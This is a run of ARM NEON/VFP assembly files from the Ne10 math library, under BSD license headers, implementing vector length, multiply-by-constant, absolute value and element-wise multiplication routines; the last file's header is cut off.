@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_len_vec4f(arm_float_t * dst,
@ arm_vec4f_t * src,
@ unsigned int count);
@
@ r0: *dst & the current dst entry's address
@ r1: *src & current src entry's address
@ r2: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@ r3: the number of items that are left to be processed at the end of
@ the input array
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
and r3, r2, #3 @ r3 = count % 4;
sub r2, r2, r3 @ count = count - r3; This is what's left to be processed after this loop
cbz r2, .L_check_vec4
@ load values for the first iteration
vld4.32 {d0, d2, d4, d6}, [r1]!
vld4.32 {d1, d3, d5, d7}, [r1]!
subs r2, r2, #4
@ calculate sum of square of the components
vmul.f32 q9, q0, q0
vmla.f32 q9, q1, q1
vmla.f32 q9, q2, q2
vmla.f32 q9, q3, q3
ble .L_mainloopend_vec4
.L_mainloop_vec4:
@ load the next set of values
vld4.32 {d0, d2, d4, d6}, [r1]!
vld4.32 {d1, d3, d5, d7}, [r1]!
subs r2, r2, #4
@ get SQRT of the last vector while loading a new vector
vrsqrte.f32 q10, q9
vmul.f32 q8, q9, q10
vrsqrts.f32 q8, q8, q10
vmul.f32 q8, q10, q8
vmul.f32 q9, q9, q8
vst1.32 {q9}, [r0]!
@ calculate sum of square of the components
vmul.f32 q9, q0, q0
vmla.f32 q9, q1, q1
vmla.f32 q9, q2, q2
vmla.f32 q9, q3, q3
bgt .L_mainloop_vec4 @ loop if r2 is > r3, if we have at least another 4 vectors (12 floats) to process
.L_mainloopend_vec4:
@ the last iteration for this call
@ get SQRT of the last vector
vrsqrte.f32 q10, q9
vmul.f32 q8, q9, q10
vrsqrts.f32 q8, q8, q10
vmul.f32 q8, q10, q8
vmul.f32 q9, q9, q8
vst1.32 {q9}, [r0]!
.L_check_vec4:
@ check if anything left to process at the end of the input array
cmp r3, #0
ble .L_return_vec4
.L_secondloop_vec4:
@ process the last few items left in the input array
vld4.f32 {d0[0], d2[0], d4[0], d6[0]}, [r1]! @ The values are loaded like so:
@ q0 = { V.x, -, -, - };
@ q1 = { V.y, -, -, - };
@ q2 = { V.z, -, -, - };
subs r3, r3, #1
vmul.f32 q0, q0, q0 @ V.x^2
vmla.f32 q0, q1, q1 @ V.x^2 + V.y^2
vmla.f32 q0, q2, q2 @ V.x^2 + V.y^2 + V.z^2
vmla.f32 q0, q3, q3 @ V.x^2 + V.y^2 + V.z^2 + V.w^2
@ get SQRT of the vector
vrsqrte.f32 q2, q0
vmul.f32 q1, q0, q2
vrsqrts.f32 q1, q1, q2
vmul.f32 q1, q2, q1
vmul.f32 q0, q0, q1
vst1.32 d0[0], [r0]!
bgt .L_secondloop_vec4
.L_return_vec4:
@ return
mov r0, #0
bx lr
|
open-vela/external_Ne10 | 9,791 | modules/math/NE10_mulc.asm.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_mulc.asm.s
@
.text
.syntax unified
.include "NE10header.s"
.balign 4
.global ne10_mulc_float_asm
.thumb
.thumb_func
ne10_mulc_float_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_mulc_float(arm_vec2f_t * dst,
@ arm_float_t * src, const arm_float_t * cst,
@ unsigned int count)
@
@ r0: *dst
@ r1: *src
@ r2: cst
@ r3: int count
@
@ r3: loop counter
@ r5: current item's offset in both src[] and dst[]
@ r6: current source item's address made of base(r1)+offset(r5)
@ r7: current destination item's address made of base(r0)+offset(r5)
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5, r6, r7}
cbz r3, .LoopEndFloat
mov r5, #0
.LoopBeginFloat:
add r6, r1, r5 @ Get current source item's address in memory
vldr s1, [r6, #0] @ Load src[i]
vmov s3, r2 @ Get cst into register s3
vmul.f32 s10, s1, s3 @ s10 = src[i] * cst
add r7, r0, r5 @ Get current destination item's address in memory
vstr s10, [r7, #0] @ Store the result back into the main memory
add r5, r5, #4 @ increase the offset by 1*sizeof(float) @@ (for x and y)
subs r3, r3, #1 @ count down using the current index (i--)
bne .LoopBeginFloat @ Continue if "i < count"
.LoopEndFloat:
mov r0, NE10_OK @ Return NE10_OK
pop {r4, r5, r6, r7}
bx lr
.balign 4
.global ne10_mulc_vec2f_asm
.thumb
.thumb_func
ne10_mulc_vec2f_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_mulc_vec2f(arm_vec2f_t * dst,
@ arm_vec2f_t * src, const arm_vec2f_t * cst,
@ unsigned int count)
@
@ r0: *dst
@ r1: *src
@ r2: *cst
@ r3: int count
@
@ r3: loop counter
@ r5: current item's offset in both src[] and dst[]
@ r6: current source item's address made of base(r1)+offset(r5)
@ r7: current destination item's address made of base(r0)+offset(r5)
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5, r6, r7}
cbz r3, .LoopEndVec2F
mov r5, #0
.LoopBeginVec2F:
add r6, r1, r5 @ Get current source item's address in memory
vldr s1, [r6, #0] @ Load src[i].x and src[i].y
vldr s2, [r6, #4]
vldr s3, [r2, #0] @ Load cst->x and cst->y
vldr s4, [r2, #4]
vmul.f32 s10, s1, s3 @ s10 = src[i].x * cst->x
vmul.f32 s11, s2, s4 @ s11 = src[i].y * cst->y
add r7, r0, r5 @ Get current destination item's address in memory
vstr s10, [r7, #0] @ Store the results back into the main memory
vstr s11, [r7, #4]
add r5, r5, #8 @ increase the offset by 2*sizeof(float) @@ (for x and y)
subs r3, r3, #1 @ count down using the current index (i--)
bne .LoopBeginVec2F @ Continue if "i < count"
.LoopEndVec2F:
mov r0, NE10_OK @ Return NE10_OK
pop {r4, r5, r6, r7}
bx lr
.balign 4
.global ne10_mulc_vec3f_asm
.thumb
.thumb_func
ne10_mulc_vec3f_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_mulc_vec3f(arm_vec3f_t * dst,
@ arm_vec3f_t * src, const arm_vec3f_t * cst,
@ unsigned int count)
@
@ r0: *dst
@ r1: *src
@ r2: *cst
@ r3: int count
@
@ r3: loop counter
@ r5: current item's offset in both src[] and dst[]
@ r6: current source item's address made of base(r1)+offset(r5)
@ r7: current destination item's address made of base(r0)+offset(r5)
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5, r6, r7}
cbz r3, .LoopEndVec3F
mov r5, #0
.LoopBeginVec3F:
add r6, r1, r5 @ Get current source item's address in memory
vldr s1, [r6, #0] @ Load src[i].x, src[i].y , and src[i].z
vldr s2, [r6, #4]
vldr s3, [r6, #8]
vldr s4, [r2, #0] @ Load cst->x, cst->y, and cst->z
vldr s5, [r2, #4]
vldr s6, [r2, #8]
vmul.f32 s10, s1, s4 @ s10 = src[i].x * cst->x
vmul.f32 s11, s2, s5 @ s11 = src[i].y * cst->y
vmul.f32 s12, s3, s6 @ s12 = src[i].z * cst->z
add r7, r0, r5 @ Get current destination item's address in memory
vstr s10, [r7, #0] @ Store the results back into the main memory
vstr s11, [r7, #4]
vstr s12, [r7, #8]
add r5, r5, #12 @ increase the offset by 3*sizeof(float) @@ (for x, y, and z)
subs r3, r3, #1 @ count down using the current index (i--)
bne .LoopBeginVec3F @ Continue if "i < count"
.LoopEndVec3F:
mov r0, NE10_OK @ Return NE10_OK
pop {r4, r5, r6, r7}
bx lr
.balign 4
.global ne10_mulc_vec4f_asm
.thumb
.thumb_func
ne10_mulc_vec4f_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_mulc_vec4f(arm_vec4f_t * dst,
@ arm_vec4f_t * src, const arm_vec4f_t * cst,
@ unsigned int count)
@
@ r0: *dst
@ r1: *src
@ r2: *cst
@ r3: int count
@
@ r3: loop counter
@ r5: current item's offset in both src[] and dst[]
@ r6: current source item's address made of base(r1)+offset(r5)
@ r7: current destination item's address made of base(r0)+offset(r5)
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5, r6, r7}
cbz r3, .LoopEndVec4F
mov r5, #0
.LoopBeginVec4F:
add r6, r1, r5 @ Get current source item's address in memory
vldr s1, [r6, #0] @ Load src[i].x, src[i].y , src[i].z, and w
vldr s2, [r6, #4]
vldr s3, [r6, #8]
vldr s4, [r6, #12]
vldr s5, [r2, #0] @ Load cst->x, cst->y, cst->z, and w
vldr s6, [r2, #4]
vldr s7, [r2, #8]
vldr s8, [r2, #12]
vmul.f32 s10, s1, s5 @ s10 = src[i].x * cst->x
vmul.f32 s11, s2, s6 @ s11 = src[i].y * cst->y
vmul.f32 s12, s3, s7 @ s12 = src[i].z * cst->z
vmul.f32 s13, s4, s8 @ s13 = src[i].w * cst->w
add r7, r0, r5 @ Get current destination item's address in memory
vstr s10, [r7, #0] @ Store the results back into the main memory
vstr s11, [r7, #4]
vstr s12, [r7, #8]
vstr s13, [r7, #12]
add r5, r5, #16 @ increase the offset by 4*sizeof(float) @@ (for x, y, z, and w)
subs r3, r3, #1 @ count down using the current index (i--)
bne .LoopBeginVec4F @ Continue if "i < count"
.LoopEndVec4F:
mov r0, NE10_OK @ Return NE10_OK
pop {r4, r5, r6, r7}
bx lr
|
open-vela/external_Ne10 | 1,607 | modules/math/NE10_cross.asm.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_cross.asm.s
@
|
open-vela/external_Ne10 | 2,938 | modules/math/NE10_abs.asm.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_abs.asm.s
@
.text
.syntax unified
.include "NE10header.s"
.balign 4
.global ne10_abs_float_asm
.thumb
.thumb_func
ne10_abs_float_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_abs_float(arm_float_t * dst,
@ arm_float_t * src,
@ unsigned int count)
@
@ r0: *dst
@ r1: *src
@ r2: int count
@
@ r2: loop counter
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
cbz r2, .LoopEndFloat
mov r3, #0
vmov s2, r3
.LoopBeginFloat:
vldr s1, [r1] @ Load s1 = src[i]
add r1, r1, #4 @ move to the next item
vabs.f32 s1, s1 @ get the absolute value; s1 = abs(s1 - 0)
vstr s1, [r0] @ Store it back into the main memory; dst[i] = s1
add r0, r0, #4 @ move to the next entry
subs r2, r2, #1 @ count down using the current index (i--)
bne .LoopBeginFloat @ Continue if "i < count"
.LoopEndFloat:
mov r0, NE10_OK @ Return NE10_OK
bx lr
|
open-vela/external_Ne10 | 1,610 | modules/math/NE10_transmat.asm.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_transmat.asm.s
@
|
open-vela/external_Ne10 | 14,846 | modules/math/NE10_mul.neon.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_mul.neon.s
@
.text
.syntax unified
.include "NE10header.s"
.align 4
.global ne10_mul_float_neon
.thumb
.thumb_func
ne10_mul_float_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_mul_float(arm_float_t * dst,
@ arm_float_t * src1,
@ arm_float_t * src2,
@ unsigned int count)
@
@ r0: *dst & current dst entry's address
@ r1: *src1 & current src1 entry's address
@ r2: *src2 & current src2 entry's address
@ r3: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@
@ r4: the number of items that are left to be processed at the end of
@ the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4}
and r4, r3, #3 @ r4 = count % 4;
sub r3, r3, r4 @ count = count - r4; This is what's left to be processed after this loop
cbz r3, .L_check_float
@ load the current set of values
vld1.32 {q0}, [r1]!
vld1.32 {q1}, [r2]!
subs r3, r3, #4 @ 4 for this set
@ calculate values for the current set
vmul.f32 q3, q0, q1 @ q3 = q0 * q1
ble .L_mainloopend_float
.L_mainloop_float:
@ store the result for the current set
vst1.32 {d6,d7}, [r0]!
@ load the next set of values
vld1.32 {q0}, [r1]!
vld1.32 {q1}, [r2]!
subs r3, r3, #4
@ calculate values for the next set
vmul.f32 q3, q0, q1 @ q3 = q0 * q1
bgt .L_mainloop_float @ loop if r3 > 0, if we have at least another 4 floats
.L_mainloopend_float:
@ the last iteration for this call
@ store the result for the last one
vst1.32 {d6,d7}, [r0]!
.L_check_float:
@ check if anything left to process at the end of the input array
cmp r4, #0
ble .L_return_float
.L_secondloop_float:
@ process the last few items left in the input array
vld1.f32 d0[0], [r1]! @ Fill in d0[0]
vld1.f32 d1[0], [r2]! @ Fill in d1[1]
subs r4, r4, #1
@ values
vmul.f32 d0, d0, d1
vst1.32 {d0[0]}, [r0]!
bgt .L_secondloop_float
.L_return_float:
@ return
pop {r4}
mov r0, #0
bx lr
.align 4
.global ne10_vmul_vec2f_neon
.thumb
.thumb_func
ne10_vmul_vec2f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_mul_float(arm_vec2f_t * dst,
@ arm_vec2f_t * src1,
@ arm_vec2f_t * src2,
@ unsigned int count)
@
@ r0: *dst & current dst entry's address
@ r1: *src1 & current src1 entry's address
@ r2: *src2 & current src2 entry's address
@ r3: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@
@ r4: the number of items that are left to be processed at the end of
@ the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4}
and r4, r3, #3 @ r4 = count % 4;
sub r3, r3, r4 @ count = count - r3; This is what's left to be processed after this loop
cbz r3, .L_check_vec2
@ load the 1st set of values
vld2.32 {q0-q1}, [r1]!
vld2.32 {q2-q3}, [r2]!
subs r3, r3, #4 @ 4 for this set
@ calculate values for the 1st set
vmul.f32 q4, q0, q2
vmul.f32 q5, q1, q3
ble .L_mainloopend_vec2
.L_mainloop_vec2:
@ store the result for the current set
vst2.32 {d8,d9,d10,d11}, [r0]!
@ load the next set of values
vld2.32 {q0-q1}, [r1]!
vld2.32 {q2-q3}, [r2]!
subs r3, r3, #4
@ calculate values for the next set
vmul.f32 q4, q0, q2
vmul.f32 q5, q1, q3
bgt .L_mainloop_vec2 @ loop if r3 > 0, if we have at least another 4 vectors (8 floats) to process
.L_mainloopend_vec2:
@ the last iteration for this call
@ store the result for the last set
vst2.32 {d8,d9,d10,d11}, [r0]!
.L_check_vec2:
@ check if anything left to process at the end of the input array
cmp r4, #0
ble .L_return_vec2
.L_secondloop_vec2:
@ process the last few items left in the input array
vld1.f32 d0, [r1]!
vld1.f32 d1, [r2]!
subs r4, r4, #1
@ calculate values
vmul.f32 d0, d0, d1
vst1.32 {d0}, [r0]!
bgt .L_secondloop_vec2
.L_return_vec2:
@ return
pop {r4}
mov r0, #0
bx lr
.align 4
.global ne10_vmul_vec3f_neon
.thumb
.thumb_func
ne10_vmul_vec3f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_mul_float(arm_vec3f_t * dst,
@ arm_vec3f_t * src1,
@ arm_vec3f_t * src2,
@ unsigned int count)
@
@ r0: *dst & current dst entry's address
@ r1: *src1 & current src1 entry's address
@ r2: *src2 & current src2 entry's address
@ r3: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@
@ r4: the number of items that are left to be processed at the end of
@ the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4}
and r4, r3, #3 @ r3 = count % 4;
sub r3, r3, r4 @ count = count - r3; This is what's left to be processed after this loop
cmp r3, #0
beq .L_check_vec3
@ load the 1st set of values
vld3.32 {d0, d2, d4}, [r1]!
vld3.32 {d1, d3, d5}, [r1]!
vld3.32 {d6, d8, d10}, [r2]!
vld3.32 {d7, d9, d11}, [r2]!
subs r3, r3, #4
@ calculate values for the 1st set
vmul.f32 q10, q0, q3
vmul.f32 q11, q1, q4
vmul.f32 q12, q2, q5
ble .L_mainloopend_vec3
.L_mainloop_vec3:
@ store the result for the current set
vst3.32 {d20, d22, d24}, [r0]!
vst3.32 {d21, d23, d25}, [r0]!
@ load the next set of values
vld3.32 {d0, d2, d4}, [r1]!
vld3.32 {d1, d3, d5}, [r1]!
vld3.32 {d6, d8, d10}, [r2]!
vld3.32 {d7, d9, d11}, [r2]!
subs r3, r3, #4
@ calculate values for the next set
vmul.f32 q10, q0, q3
vmul.f32 q11, q1, q4
vmul.f32 q12, q2, q5
bgt .L_mainloop_vec3 @ loop if r3 > 0, if we have at least another 4 vectors (12 floats) to process
.L_mainloopend_vec3:
@ the last iteration for this call
@ store the result for the last set
vst3.32 {d20, d22, d24}, [r0]!
vst3.32 {d21, d23, d25}, [r0]!
.L_check_vec3:
@ check if anything left to process at the end of the input array
cmp r4, #0
ble .L_return_vec3
.L_secondloop_vec3:
@ process the last few items left in the input array
vld3.f32 {d0[0], d2[0], d4[0]}, [r1]! @ The values are loaded like so:
@ q0 = { V1.x, -, -, - };
@ q1 = { V1.y, -, -, - };
@ q2 = { V1.z, -, -, - };
vld3.f32 {d1[0], d3[0], d5[0]}, [r2]! @ The values are loaded like so:
@ q0 = { V1.x, -, V2.x, - };
@ q1 = { V1.y, -, V2.y, - };
@ q2 = { V1.z, -, V2.z, - };
subs r4, r4, #1
@ calculate values for
vmul.f32 d0, d0, d1
vmul.f32 d2, d2, d3
vmul.f32 d4, d4, d5
vst3.32 {d0[0], d2[0], d4[0]}, [r0]!
bgt .L_secondloop_vec3
.L_return_vec3:
@ return
pop {r4}
mov r0, #0
bx lr
.align 4
.global ne10_vmul_vec4f_neon
.thumb
.thumb_func
ne10_vmul_vec4f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_mul_float(arm_vec4f_t * dst,
@ arm_vec4f_t * src1,
@ arm_vec4f_t * src2,
@ unsigned int count)
@
@ r0: *dst & current dst entry's address
@ r1: *src1 & current src1 entry's address
@ r2: *src2 & current src2 entry's address
@ r3: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@
@ r4: the number of items that are left to be processed at the end of
@ the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4}
and r4, r3, #3 @ r4 = count % 4;
sub r3, r3, r4 @ count = count - r4; This is what's left to be processed after this loop
cmp r3, #0
beq .L_check_vec4
@ load the 1st set of values
vld4.32 {d0, d2, d4, d6}, [r1]!
vld4.32 {d1, d3, d5, d7}, [r1]!
vld4.32 {d8, d10, d12, d14}, [r2]!
vld4.32 {d9, d11, d13, d15}, [r2]!
subs r3, r3, #4
@ calculate values for the 1st set
vmul.f32 q10, q0, q4
vmul.f32 q11, q1, q5
vmul.f32 q12, q2, q6
vmul.f32 q13, q3, q7
ble .L_mainloopend_vec4
.L_mainloop_vec4:
@ store the result for current set
vst4.32 {d20, d22, d24, d26}, [r0]!
vst4.32 {d21, d23, d25, d27}, [r0]!
@ load the next set of values
vld4.32 {d0, d2, d4, d6}, [r1]!
vld4.32 {d1, d3, d5, d7}, [r1]!
vld4.32 {d8, d10, d12, d14}, [r2]!
vld4.32 {d9, d11, d13, d15}, [r2]!
subs r3, r3, #4
@ calculate values for the next set
vmul.f32 q10, q0, q4
vmul.f32 q11, q1, q5
vmul.f32 q12, q2, q6
vmul.f32 q13, q3, q7
bgt .L_mainloop_vec4 @ loop if r3 > 0, if we have at least another 4 vectors (16 floats) to process
.L_mainloopend_vec4:
@ the last iteration for this call
@ store the result for the last set
vst4.32 {d20, d22, d24, d26}, [r0]!
vst4.32 {d21, d23, d25, d27}, [r0]!
.L_check_vec4:
@ check if anything left to process at the end of the input array
cmp r4, #0
ble .L_return_vec4
.L_secondloop_vec4:
@ process the last few items left in the input array
vld1.f32 {d0, d1}, [r1]! @ The values are loaded like so:
@ q0 = { V1.x, V1.y, V1.z, V1.w };
vld1.f32 {d2, d3}, [r2]! @ The values are loaded like so:
@ q1 = { V2.x, V2.y, V2.z, V2.w };
subs r4, r4, #1
@ calculate values
vmul.f32 q0, q0, q1
vst1.32 {d0, d1}, [r0]!
bgt .L_secondloop_vec4
.L_return_vec4:
@ return
pop {r4}
mov r0, #0
bx lr
|
open-vela/external_Ne10 | 9,403 | modules/math/NE10_detmat.neon.inc.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
